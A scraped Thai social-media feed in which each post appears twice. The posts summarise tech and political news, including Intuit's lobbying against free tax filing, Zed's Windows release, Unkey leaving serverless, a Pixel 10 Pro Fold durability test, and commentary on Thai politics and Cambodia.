    มีการล็อบบี้รัฐสภาและหน่วยงานภาษีอย่างต่อเนื่อง
    ผู้ใช้หลายล้านคนเสียเงินโดยไม่จำเป็น ทั้งที่ควรยื่นภาษีฟรีได้

    https://www.propublica.org/article/inside-turbotax-20-year-fight-to-stop-americans-from-filing-their-taxes-for-free
    💸 “20 ปีแห่งการต่อสู้ของ TurboTax” — เมื่อบริษัทซอฟต์แวร์พยายามขัดขวางคนอเมริกันจากการยื่นภาษีฟรี บทความจาก ProPublica เปิดเผยเบื้องหลังการล็อบบี้และกลยุทธ์ของ Intuit บริษัทเจ้าของ TurboTax ที่ใช้เวลากว่า 20 ปีในการขัดขวางไม่ให้รัฐบาลสหรัฐฯ สร้างระบบยื่นภาษีฟรีสำหรับประชาชน ทั้งที่เทคโนโลยีและข้อมูลพร้อมแล้ว Intuit ใช้งบประมาณมหาศาลในการล็อบบี้รัฐสภาและหน่วยงานภาษี (IRS) เพื่อผลักดันข้อตกลง “Free File” ซึ่งให้บริษัทเอกชนสร้างระบบยื่นภาษีฟรีแทนรัฐบาล แต่แฝงข้อจำกัดมากมาย เช่น: 💸 จำกัดเฉพาะผู้มีรายได้น้อย 💸 ซ่อนช่องทางฟรีจากการค้นหา 💸 บังคับให้ผู้ใช้ซื้อบริการเสริมที่ไม่จำเป็น แม้จะมีผู้ใช้หลายล้านคนที่ควรได้รับสิทธิ์ยื่นภาษีฟรี แต่กลับถูกนำไปสู่หน้าเสียเงินโดยเจตนา ผ่านการออกแบบ UX ที่ซับซ้อนและการใช้ SEO เพื่อเบี่ยงเบนการค้นหา Intuit ยังพยายามขัดขวางโครงการ “Direct File” ของ IRS ที่จะให้ประชาชนยื่นภาษีตรงกับรัฐบาลโดยไม่ผ่านบริษัทเอกชน โดยอ้างว่า “จะทำให้เกิดความสับสนและลดนวัตกรรม” ✅ ข้อมูลในข่าว ➡️ Intuit ใช้เวลากว่า 20 ปีในการขัดขวางระบบยื่นภาษีฟรีของรัฐบาล ➡️ ข้อตกลง Free File ให้บริษัทเอกชนสร้างระบบยื่นภาษีฟรีแทนรัฐบาล ➡️ ระบบฟรีถูกจำกัดเฉพาะผู้มีรายได้น้อย และถูกซ่อนจากการค้นหา ➡️ UX ถูกออกแบบให้ผู้ใช้หลงไปใช้บริการเสียเงิน ➡️ SEO ถูกใช้เพื่อเบี่ยงเบนการค้นหาจากช่องทางฟรี ➡️ Intuit ต่อต้านโครงการ Direct File ของ IRS ➡️ อ้างว่า Direct File จะลดนวัตกรรมและทำให้ผู้ใช้สับสน ➡️ มีการล็อบบี้รัฐสภาและหน่วยงานภาษีอย่างต่อเนื่อง ➡️ ผู้ใช้หลายล้านคนเสียเงินโดยไม่จำเป็น ทั้งที่ควรยื่นภาษีฟรีได้ https://www.propublica.org/article/inside-turbotax-20-year-fight-to-stop-americans-from-filing-their-taxes-for-free
    WWW.PROPUBLICA.ORG
    Inside TurboTax’s 20-Year Fight to Stop Americans From Filing Their Taxes for Free
    Using lobbying, the revolving door and “dark pattern” customer tricks, Intuit fended off the government’s attempts to make tax filing free and easy, and created its multi-billion-dollar franchise.
    0 ความคิดเห็น 0 การแบ่งปัน 56 มุมมอง 0 รีวิว
  • “Zed มาแล้วบน Windows!” — เปิดตัวเวอร์ชันเต็ม พร้อมฟีเจอร์เฉพาะแพลตฟอร์มและทีมพัฒนาเต็มเวลา

    เล่าเรื่องให้ฟัง: หลังจากเปิดให้ใช้งานบน macOS และ Linux มานาน วันนี้ Zed เปิดตัวเวอร์ชัน Windows อย่างเป็นทางการ โดยผู้ใช้สามารถดาวน์โหลดได้ทั้งรุ่น stable และ preview ซึ่งจะได้รับฟีเจอร์ใหม่ล่วงหน้าหนึ่งสัปดาห์

    Zed ไม่ใช่แอป Electron แต่ใช้ DirectX 11 และ DirectWrite เพื่อให้การเรนเดอร์ภาพและข้อความสอดคล้องกับลักษณะของ Windows อย่างแท้จริง ทีมงานยังประกาศว่าจะมีทีม Windows เต็มเวลาเพื่อดูแลแพลตฟอร์มนี้โดยเฉพาะ

    ฟีเจอร์เด่นที่มาพร้อมเวอร์ชัน Windows ได้แก่:

    รองรับ WSL และ SSH remoting: เปิดโฟลเดอร์จาก WSL terminal หรือเชื่อมต่อเซิร์ฟเวอร์ Linux ได้โดยตรง
    ระบบ remote server เบาและเร็ว: ทำงานผ่าน wsl.exe หรือ ssh.exe รองรับการแก้ไขไฟล์, Git, terminal, task, language server และ debugger
    รองรับ extension เต็มรูปแบบ: ใช้ WebAssembly Components ผ่าน WASI โดยไม่ต้องแก้ไข path ระหว่าง Windows กับ Unix
    รองรับ AI agent และ ACP edit prediction: ใช้งาน Claude Code ได้เต็มรูปแบบบน Windows
    มีระบบ trial Zed Pro 14 วัน และสามารถใช้ API key ของตัวเองได้

    ทีมงานขอบคุณผู้ทดสอบช่วง Alpha และ Beta ที่ช่วยรายงานบั๊ก และขอรับฟัง feedback เพิ่มเติม โดยเฉพาะเรื่อง WSL workflow, IME, layout คีย์บอร์ด, multi-monitor และจอ 120–144Hz

    ข้อมูลในข่าว
    Zed เปิดตัวเวอร์ชัน Windows อย่างเป็นทางการ
    มีทั้งรุ่น stable และ preview ให้เลือกดาวน์โหลด
    ใช้ DirectX 11 และ DirectWrite เพื่อเรนเดอร์ภาพและข้อความ
    มีทีม Windows เต็มเวลาเพื่อดูแลแพลตฟอร์ม
    รองรับ WSL และ SSH remoting ผ่านระบบ remote server
    รองรับการแก้ไขไฟล์, Git, terminal, task, language server และ debugger
    Extension ใช้ WebAssembly Components ผ่าน WASI
    ไม่ต้องแก้ไข path ระหว่าง Windows กับ Unix
    รองรับ AI agent และ Claude Code ผ่าน ACP
    ทดลองใช้ Zed Pro ฟรี 14 วัน หรือใช้ API key ของตัวเอง
    ขอ feedback เพิ่มเติมจากผู้ใช้ Windows

    https://zed.dev/blog/zed-for-windows-is-here
    🪟 “Zed มาแล้วบน Windows!” — เปิดตัวเวอร์ชันเต็ม พร้อมฟีเจอร์เฉพาะแพลตฟอร์มและทีมพัฒนาเต็มเวลา เล่าเรื่องให้ฟัง: หลังจากเปิดให้ใช้งานบน macOS และ Linux มานาน วันนี้ Zed เปิดตัวเวอร์ชัน Windows อย่างเป็นทางการ โดยผู้ใช้สามารถดาวน์โหลดได้ทั้งรุ่น stable และ preview ซึ่งจะได้รับฟีเจอร์ใหม่ล่วงหน้าหนึ่งสัปดาห์ Zed ไม่ใช่แอป Electron แต่ใช้ DirectX 11 และ DirectWrite เพื่อให้การเรนเดอร์ภาพและข้อความสอดคล้องกับลักษณะของ Windows อย่างแท้จริง ทีมงานยังประกาศว่าจะมีทีม Windows เต็มเวลาเพื่อดูแลแพลตฟอร์มนี้โดยเฉพาะ ฟีเจอร์เด่นที่มาพร้อมเวอร์ชัน Windows ได้แก่: 🧩 รองรับ WSL และ SSH remoting: เปิดโฟลเดอร์จาก WSL terminal หรือเชื่อมต่อเซิร์ฟเวอร์ Linux ได้โดยตรง ⚙️ ระบบ remote server เบาและเร็ว: ทำงานผ่าน wsl.exe หรือ ssh.exe รองรับการแก้ไขไฟล์, Git, terminal, task, language server และ debugger 🧪 รองรับ extension เต็มรูปแบบ: ใช้ WebAssembly Components ผ่าน WASI โดยไม่ต้องแก้ไข path ระหว่าง Windows กับ Unix 🤖 รองรับ AI agent และ ACP edit prediction: ใช้งาน Claude Code ได้เต็มรูปแบบบน Windows 🧠 มีระบบ trial Zed Pro 14 วัน และสามารถใช้ API key ของตัวเองได้ ทีมงานขอบคุณผู้ทดสอบช่วง Alpha และ Beta ที่ช่วยรายงานบั๊ก และขอรับฟัง feedback เพิ่มเติม โดยเฉพาะเรื่อง WSL workflow, IME, layout คีย์บอร์ด, multi-monitor และจอ 120–144Hz ✅ ข้อมูลในข่าว ➡️ Zed เปิดตัวเวอร์ชัน Windows อย่างเป็นทางการ ➡️ มีทั้งรุ่น stable และ preview ให้เลือกดาวน์โหลด ➡️ ใช้ DirectX 11 และ DirectWrite เพื่อเรนเดอร์ภาพและข้อความ ➡️ มีทีม Windows เต็มเวลาเพื่อดูแลแพลตฟอร์ม ➡️ รองรับ WSL และ SSH remoting ผ่านระบบ remote server ➡️ รองรับการแก้ไขไฟล์, Git, terminal, task, language server และ debugger ➡️ Extension ใช้ WebAssembly Components ผ่าน WASI ➡️ ไม่ต้องแก้ไข path ระหว่าง Windows กับ Unix ➡️ รองรับ AI agent และ Claude Code ผ่าน ACP ➡️ ทดลองใช้ Zed Pro ฟรี 14 วัน หรือใช้ API key ของตัวเอง ➡️ ขอ feedback เพิ่มเติมจากผู้ใช้ Windows https://zed.dev/blog/zed-for-windows-is-here
    ZED.DEV
    Windows When? Windows Now - Zed Blog
    From the Zed Blog: Zed for Windows is finally here. Download it today.
    0 ความคิดเห็น 0 การแบ่งปัน 55 มุมมอง 0 รีวิว
  • “Unkey ลาออกจาก Serverless” — เมื่อความเร็วและความเรียบง่ายสำคัญกว่าแนวคิดไร้เซิร์ฟเวอร์

    หลังจากใช้ Cloudflare Workers มานานกว่า 2 ปี Unkey ตัดสินใจย้ายระบบ API authentication ทั้งหมดไปใช้ Go servers แบบ stateful โดยให้เหตุผลว่า serverless แม้จะดูดีในแง่การกระจายโหลดและต้นทุน แต่กลับสร้าง “ภาษีความซับซ้อน” ที่ทำให้ทีมต้องสร้าง workaround มากมายเพื่อให้ระบบทำงานได้เร็วและเสถียร

    ปัญหาหลักคือ latency ที่ไม่สามารถลดต่ำกว่า 30ms ได้ แม้จะใช้ cache หลายชั้น รวมถึงการต้องพึ่งพา SaaS หลายตัวเพื่อแก้ปัญหาที่ serverless สร้างขึ้น เช่น Redis, Queues, Durable Objects และ Logstreams ซึ่งเพิ่มทั้งความซับซ้อนและจุดล้มเหลว

    เมื่อย้ายมาใช้ Go servers ทีมสามารถลด latency ได้ถึง 6 เท่า และตัดทิ้งระบบ pipeline ที่ซับซ้อน เช่น chproxy และ logdrain workers โดยใช้การ batch ข้อมูลใน memory แบบง่าย ๆ แทน

    นอกจากนี้ยังได้ประโยชน์ด้าน self-hosting, การพัฒนาในเครื่อง, และการหลุดพ้นจากข้อจำกัดของ Cloudflare runtime โดยยังคงใช้ AWS Global Accelerator และ Fargate เพื่อรักษาความสามารถในการกระจายโหลดและ autoscaling

    ข้อมูลในข่าว
    Unkey ย้ายจาก Cloudflare Workers ไปใช้ Go servers แบบ stateful
    ลด latency ได้ถึง 6 เท่า จากเดิมที่ติดอยู่ที่ 30ms+
    ปัญหาหลักคือการ cache ที่ต้องพึ่ง network request เสมอ
    ใช้ cache แบบ SWR หลายชั้นแต่ยังไม่เร็วพอ
    ต้องใช้ SaaS หลายตัวเพื่อแก้ปัญหา serverless เช่น Redis, Queues, Durable Objects
    pipeline สำหรับ analytics และ logs มีความซับซ้อนสูง
    ใช้ chproxy เพื่อ buffer event ก่อนส่งเข้า ClickHouse
    ใช้ logdrain worker เพื่อจัดการ metrics และ logs ก่อนส่งเข้า Axiom
    เมื่อย้ายมา Go servers สามารถ batch ข้อมูลใน memory ได้โดยตรง
    ลดความซับซ้อนของระบบจาก distributed system เหลือแค่ application เดียว
    รองรับ self-hosting ด้วยคำสั่งง่าย ๆ เช่น docker run -p 8080:8080 unkey/api
    พัฒนาและ debug ในเครื่องได้ง่ายขึ้น
    หลุดพ้นจากข้อจำกัดของ Cloudflare runtime
    ใช้ AWS Global Accelerator และ Fargate เพื่อรักษาความสามารถในการกระจายโหลด
    เตรียมเปิดตัว “Unkey Deploy” แพลตฟอร์มสำหรับรัน Unkey ได้ทุกที่

    https://www.unkey.com/blog/serverless-exit
    🚪 “Unkey ลาออกจาก Serverless” — เมื่อความเร็วและความเรียบง่ายสำคัญกว่าแนวคิดไร้เซิร์ฟเวอร์ หลังจากใช้ Cloudflare Workers มานานกว่า 2 ปี Unkey ตัดสินใจย้ายระบบ API authentication ทั้งหมดไปใช้ Go servers แบบ stateful โดยให้เหตุผลว่า serverless แม้จะดูดีในแง่การกระจายโหลดและต้นทุน แต่กลับสร้าง “ภาษีความซับซ้อน” ที่ทำให้ทีมต้องสร้าง workaround มากมายเพื่อให้ระบบทำงานได้เร็วและเสถียร ปัญหาหลักคือ latency ที่ไม่สามารถลดต่ำกว่า 30ms ได้ แม้จะใช้ cache หลายชั้น รวมถึงการต้องพึ่งพา SaaS หลายตัวเพื่อแก้ปัญหาที่ serverless สร้างขึ้น เช่น Redis, Queues, Durable Objects และ Logstreams ซึ่งเพิ่มทั้งความซับซ้อนและจุดล้มเหลว เมื่อย้ายมาใช้ Go servers ทีมสามารถลด latency ได้ถึง 6 เท่า และตัดทิ้งระบบ pipeline ที่ซับซ้อน เช่น chproxy และ logdrain workers โดยใช้การ batch ข้อมูลใน memory แบบง่าย ๆ แทน นอกจากนี้ยังได้ประโยชน์ด้าน self-hosting, การพัฒนาในเครื่อง, และการหลุดพ้นจากข้อจำกัดของ Cloudflare runtime โดยยังคงใช้ AWS Global Accelerator และ Fargate เพื่อรักษาความสามารถในการกระจายโหลดและ autoscaling ✅ ข้อมูลในข่าว ➡️ Unkey ย้ายจาก Cloudflare Workers ไปใช้ Go servers แบบ stateful ➡️ ลด latency ได้ถึง 6 เท่า จากเดิมที่ติดอยู่ที่ 30ms+ ➡️ ปัญหาหลักคือการ cache ที่ต้องพึ่ง network request เสมอ ➡️ ใช้ cache แบบ SWR หลายชั้นแต่ยังไม่เร็วพอ ➡️ ต้องใช้ SaaS หลายตัวเพื่อแก้ปัญหา serverless เช่น Redis, Queues, Durable Objects ➡️ pipeline สำหรับ analytics และ logs มีความซับซ้อนสูง ➡️ ใช้ chproxy เพื่อ buffer event ก่อนส่งเข้า ClickHouse ➡️ ใช้ logdrain worker เพื่อจัดการ metrics และ logs ก่อนส่งเข้า Axiom ➡️ เมื่อย้ายมา Go servers สามารถ batch ข้อมูลใน memory ได้โดยตรง ➡️ ลดความซับซ้อนของระบบจาก distributed system เหลือแค่ application เดียว ➡️ รองรับ self-hosting ด้วยคำสั่งง่าย ๆ เช่น docker run -p 8080:8080 unkey/api ➡️ พัฒนาและ debug ในเครื่องได้ง่ายขึ้น ➡️ หลุดพ้นจากข้อจำกัดของ Cloudflare runtime ➡️ ใช้ AWS Global Accelerator และ Fargate เพื่อรักษาความสามารถในการกระจายโหลด ➡️ เตรียมเปิดตัว “Unkey Deploy” แพลตฟอร์มสำหรับรัน Unkey ได้ทุกที่ https://www.unkey.com/blog/serverless-exit
    0 ความคิดเห็น 0 การแบ่งปัน 71 มุมมอง 0 รีวิว
  • ความล่มสลายของธุรกิจเพื่อไทย เมื่อการเมืองคือการสืบสายเลือด

    บทความโดย : สุรวิชช์ วีรวรรณ

    คลิก>> https://mgronline.com/daily/detail/9680000099151
    ความล่มสลายของธุรกิจเพื่อไทย เมื่อการเมืองคือการสืบสายเลือด บทความโดย : สุรวิชช์ วีรวรรณ คลิก>> https://mgronline.com/daily/detail/9680000099151
    MGRONLINE.COM
    ความล่มสลายของธุรกิจเพื่อไทย เมื่อการเมืองคือการสืบสายเลือด
    หลังปี 2566 การเมืองไทยกำลังเปลี่ยนผ่านอย่างเงียบแต่รุนแรง
    0 ความคิดเห็น 0 การแบ่งปัน 38 มุมมอง 0 รีวิว
  • “Pixel 10 Pro Fold พังกลางคลิปทดสอบ” — เมื่อการงอเครื่องผิดทิศทางทำให้เกิดควันและความกังวลเรื่องความปลอดภัย

    Google Pixel 10 Pro Fold ซึ่งเป็นมือถือพับรุ่นล่าสุดจาก Google ได้รับความสนใจอย่างมากจากผู้ใช้และนักรีวิว โดยเฉพาะด้านซอฟต์แวร์ที่ผสาน AI ได้อย่างลงตัว แม้ฮาร์ดแวร์จะไม่หรูเท่า Galaxy Z Fold 7 แต่ก็ถือว่าแข็งแรงและใช้งานดี

    อย่างไรก็ตาม คลิปทดสอบความทนทานจากช่อง JerryRigEverything กลับสร้างความตกตะลึง เมื่อ Zack Nelson พยายามงอเครื่องย้อนกลับเพื่อทดสอบความแข็งแรงของบานพับ แล้วเกิดเหตุการณ์ไม่คาดคิด — เครื่องเริ่มปล่อยควันหนาออกมา ซึ่งเป็นครั้งแรกที่เกิดไฟไหม้ในคลิปทดสอบของเขา

    เหตุการณ์นี้เกิดจากแบตเตอรี่ที่ได้รับแรงกดผิดปกติ ซึ่งเป็นสิ่งที่ผู้ผลิตเตือนว่าอาจทำให้เกิดไฟไหม้หรือระเบิดได้ โดยเฉพาะเมื่อแบตเตอรี่ถูกเจาะหรือโดนความร้อนสูง

    แม้จะดูน่ากังวล แต่ผู้เชี่ยวชาญชี้ว่า การใช้งานจริงของผู้ใช้ทั่วไปไม่ควรทำให้เกิดเหตุการณ์แบบนี้ เพราะไม่มีใครงอเครื่องย้อนกลับแบบในคลิป และแบตเตอรี่ของ Pixel 10 Pro Fold ก็ไม่ได้มีปัญหาในกรณีใช้งานปกติ

    ข้อมูลในข่าว
    Pixel 10 Pro Fold เป็นมือถือพับรุ่นล่าสุดจาก Google
    คลิปทดสอบจาก JerryRigEverything ทำให้เครื่องปล่อยควันออกมา
    การงอเครื่องย้อนกลับทำให้แบตเตอรี่เสียหาย
    เป็นครั้งแรกที่เกิดไฟไหม้ในคลิปทดสอบของ Zack Nelson
    แบตเตอรี่ที่ถูกกดหรือเจาะอาจทำให้เกิดไฟไหม้หรือระเบิด
    Google ยังไม่ได้แสดงความเห็นอย่างเป็นทางการ
    ผู้ใช้ทั่วไปไม่ควรพบปัญหานี้ในการใช้งานปกติ
    Pixel 10 Pro Fold ได้รับคำชมเรื่องซอฟต์แวร์และ AI integration
    ผู้ทดสอบเปรียบเทียบกับ OnePlus Open ที่ยังทำงานได้ดีแม้เก็บไว้ 20 เดือน

    https://www.slashgear.com/1998186/pixel-10-pro-durability-test-failure-explained/
    🔥 “Pixel 10 Pro Fold พังกลางคลิปทดสอบ” — เมื่อการงอเครื่องผิดทิศทางทำให้เกิดควันและความกังวลเรื่องความปลอดภัย Google Pixel 10 Pro Fold ซึ่งเป็นมือถือพับรุ่นล่าสุดจาก Google ได้รับความสนใจอย่างมากจากผู้ใช้และนักรีวิว โดยเฉพาะด้านซอฟต์แวร์ที่ผสาน AI ได้อย่างลงตัว แม้ฮาร์ดแวร์จะไม่หรูเท่า Galaxy Z Fold 7 แต่ก็ถือว่าแข็งแรงและใช้งานดี อย่างไรก็ตาม คลิปทดสอบความทนทานจากช่อง JerryRigEverything กลับสร้างความตกตะลึง เมื่อ Zack Nelson พยายามงอเครื่องย้อนกลับเพื่อทดสอบความแข็งแรงของบานพับ แล้วเกิดเหตุการณ์ไม่คาดคิด — เครื่องเริ่มปล่อยควันหนาออกมา ซึ่งเป็นครั้งแรกที่เกิดไฟไหม้ในคลิปทดสอบของเขา เหตุการณ์นี้เกิดจากแบตเตอรี่ที่ได้รับแรงกดผิดปกติ ซึ่งเป็นสิ่งที่ผู้ผลิตเตือนว่าอาจทำให้เกิดไฟไหม้หรือระเบิดได้ โดยเฉพาะเมื่อแบตเตอรี่ถูกเจาะหรือโดนความร้อนสูง แม้จะดูน่ากังวล แต่ผู้เชี่ยวชาญชี้ว่า การใช้งานจริงของผู้ใช้ทั่วไปไม่ควรทำให้เกิดเหตุการณ์แบบนี้ เพราะไม่มีใครงอเครื่องย้อนกลับแบบในคลิป และแบตเตอรี่ของ Pixel 10 Pro Fold ก็ไม่ได้มีปัญหาในกรณีใช้งานปกติ ✅ ข้อมูลในข่าว ➡️ Pixel 10 Pro Fold เป็นมือถือพับรุ่นล่าสุดจาก Google ➡️ คลิปทดสอบจาก JerryRigEverything ทำให้เครื่องปล่อยควันออกมา ➡️ การงอเครื่องย้อนกลับทำให้แบตเตอรี่เสียหาย ➡️ เป็นครั้งแรกที่เกิดไฟไหม้ในคลิปทดสอบของ Zack Nelson ➡️ แบตเตอรี่ที่ถูกกดหรือเจาะอาจทำให้เกิดไฟไหม้หรือระเบิด ➡️ Google ยังไม่ได้แสดงความเห็นอย่างเป็นทางการ ➡️ ผู้ใช้ทั่วไปไม่ควรพบปัญหานี้ในการใช้งานปกติ ➡️ Pixel 10 Pro Fold ได้รับคำชมเรื่องซอฟต์แวร์และ AI integration ➡️ ผู้ทดสอบเปรียบเทียบกับ OnePlus Open ที่ยังทำงานได้ดีแม้เก็บไว้ 20 เดือน https://www.slashgear.com/1998186/pixel-10-pro-durability-test-failure-explained/
    WWW.SLASHGEAR.COM
    Pixel 10 Pro Fold Durability Test Goes Up In Smoke. Does It Really Matter? - SlashGear
    It's not uncommon for users to test the durability of tech products on the market. However, this test on a Pixel 10 Pro didn't go as planned.
    0 ความคิดเห็น 0 การแบ่งปัน 51 มุมมอง 0 รีวิว
  • น้องเขาน่ารักมาก คนไทยเราน่ารักทุกๆคนล่ะ มีโอกาส มีรายได้พอเลี้ยงชีพตนแล้ว เหลือบ้างแบ่งปันช่วยเหลือเราคนไทยด้วยกัน, ยามยากจนต่อจำเป็นในการต่อสู้เพื่อตนเอง,ยามร่ำรวยมั่งคั่งเหลือเก็บมีกำลังมากพอก็มีน้ำจิตน้ำใจแบ่งปันช่วยเหลือคนอื่นที่ครั้งหนึ่งตนก็เป็นเช่นนั้นหรือไม่ก็ตาม,ร่ำรวยแล้วช่วยเหลือกันนั้นเอง.,แต่ตนต้องไม่ลำบากด้วยนะ.
    ..น้องสร้างตัวอย่างที่ดีอีกคนในการร่วมจรรโลงสังคมไทยเรา,ใครมีบาทสองบาทหรือสิบ 20บาทอย่าน้อยเนื้อต่ำใจ เงินทองของสัมมาอาชีพชอบมีพลังอนุภาคมากนักด้วยเจตนาจิตจาคะอันดีงาม อนุภาคบุญก็ไม่น้อยกว่าคนใดบริจาค10ล้าน 100ล้านเหรอ,ตามกำลังใครมันสะดวกที่สบายใจใครมัน.
    ..กำแพงสร้างรั้วลวดหนามเราคือตัวอย่างที่ดีก็ว่า คนละเล็กละน้อย.,คนไทยเราใจดีใจบุญด้วย,น้องเจนนี่ในโอกาสนี้ก็ด้วยเช่นกัน.,หลายๆคนๆหลายๆท่านที่ไม่เป็นข่าวไม่ออกสื่อก็เยอะ ปิดทองหลังพระก็มาก บางท่านก็ทานด้วยแรงกายเป็นต้น บุญทั้งนั้น,จึงร่วมขออนุโมทนาบุญเรา..คนไทยทุกๆคนทั่วประเทศด้วยรวมถึงน้องเจนนี่นี้ด้วย,เราร่วมแสดงความยินดีในบุญเขาให้เขามีพลังใจสร้างสิ่งดีๆทั้งต่อตนเองและคนรอบข้างดีแล้ว,ร่วมเป็นกำลังใจสร้างความดีบนแผ่นดินไทยเรา,ไทยไม่ช่วยไทยใครจะมาช่วยเรา.

    https://youtube.com/shorts/4XPh65UKF74?si=_IfLQLYGXKd4R6hZ
    น้องเขาน่ารักมาก คนไทยเราน่ารักทุกๆคนล่ะ มีโอกาส มีรายได้พอเลี้ยงชีพตนแล้ว เหลือบ้างแบ่งปันช่วยเหลือเราคนไทยด้วยกัน, ยามยากจนต่อจำเป็นในการต่อสู้เพื่อตนเอง,ยามร่ำรวยมั่งคั่งเหลือเก็บมีกำลังมากพอก็มีน้ำจิตน้ำใจแบ่งปันช่วยเหลือคนอื่นที่ครั้งหนึ่งตนก็เป็นเช่นนั้นหรือไม่ก็ตาม,ร่ำรวยแล้วช่วยเหลือกันนั้นเอง.,แต่ตนต้องไม่ลำบากด้วยนะ. ..น้องสร้างตัวอย่างที่ดีอีกคนในการร่วมจรรโลงสังคมไทยเรา,ใครมีบาทสองบาทหรือสิบ 20บาทอย่าน้อยเนื้อต่ำใจ เงินทองของสัมมาอาชีพชอบมีพลังอนุภาคมากนักด้วยเจตนาจิตจาคะอันดีงาม อนุภาคบุญก็ไม่น้อยกว่าคนใดบริจาค10ล้าน 100ล้านเหรอ,ตามกำลังใครมันสะดวกที่สบายใจใครมัน. ..กำแพงสร้างรั้วลวดหนามเราคือตัวอย่างที่ดีก็ว่า คนละเล็กละน้อย.,คนไทยเราใจดีใจบุญด้วย,น้องเจนนี่ในโอกาสนี้ก็ด้วยเช่นกัน.,หลายๆคนๆหลายๆท่านที่ไม่เป็นข่าวไม่ออกสื่อก็เยอะ ปิดทองหลังพระก็มาก บางท่านก็ทานด้วยแรงกายเป็นต้น บุญทั้งนั้น,จึงร่วมขออนุโมทนาบุญเรา..คนไทยทุกๆคนทั่วประเทศด้วยรวมถึงน้องเจนนี่นี้ด้วย,เราร่วมแสดงความยินดีในบุญเขาให้เขามีพลังใจสร้างสิ่งดีๆทั้งต่อตนเองและคนรอบข้างดีแล้ว,ร่วมเป็นกำลังใจสร้างความดีบนแผ่นดินไทยเรา,ไทยไม่ช่วยไทยใครจะมาช่วยเรา. https://youtube.com/shorts/4XPh65UKF74?si=_IfLQLYGXKd4R6hZ
    0 ความคิดเห็น 0 การแบ่งปัน 63 มุมมอง 0 รีวิว
  • “รศ.ดร.อัทธ์” ชี้ กัมพูชาเจอ 4 รุม 1 “ญี่ปุ่น-เกาหลีใต้” ย้ายฐานการผลิต “ไทย”ปิดด่าน ทำเขมรตกงาน ขาดรายได้ ขณะที่ราคาสินค้าพุ่งกระฉูด ซ้ำโดน “สหรัฐฯ-โสมขาว” เล่นงานแก๊งสแกมเมอร์ สกัดธุรกิจฟอกเงิน ส่งผลภาพลักษณ์กัมพูชาฉาวโฉ่ทั่วโลก นักท่องเที่ยวหดหาย ระบุ “ฮุน เซน”เริ่มเสื่อมอำนาจ เศรษฐกิจเขมรใกล้ล่มสลาย ชาวบ้านที่อดอยากอาจลุกฮือ ขับไล่“ตระกูลฮุน” นำไปสู่สงครามการเมือง เชื่อ กองกำลัง BHQ ก็เอาไม่อยู่ สุดท้ายอำนาจอาจเปลี่ยนไปอยู่ในมือของ “พล.อ.เตีย บัญ”

    อ่านต่อ..https://news1live.com/detail/9680000099096

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    “รศ.ดร.อัทธ์” ชี้ กัมพูชาเจอ 4 รุม 1 “ญี่ปุ่น-เกาหลีใต้” ย้ายฐานการผลิต “ไทย”ปิดด่าน ทำเขมรตกงาน ขาดรายได้ ขณะที่ราคาสินค้าพุ่งกระฉูด ซ้ำโดน “สหรัฐฯ-โสมขาว” เล่นงานแก๊งสแกมเมอร์ สกัดธุรกิจฟอกเงิน ส่งผลภาพลักษณ์กัมพูชาฉาวโฉ่ทั่วโลก นักท่องเที่ยวหดหาย ระบุ “ฮุน เซน”เริ่มเสื่อมอำนาจ เศรษฐกิจเขมรใกล้ล่มสลาย ชาวบ้านที่อดอยากอาจลุกฮือ ขับไล่“ตระกูลฮุน” นำไปสู่สงครามการเมือง เชื่อ กองกำลัง BHQ ก็เอาไม่อยู่ สุดท้ายอำนาจอาจเปลี่ยนไปอยู่ในมือของ “พล.อ.เตีย บัญ” อ่านต่อ..https://news1live.com/detail/9680000099096 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    Like
    1
    0 ความคิดเห็น 0 การแบ่งปัน 274 มุมมอง 0 รีวิว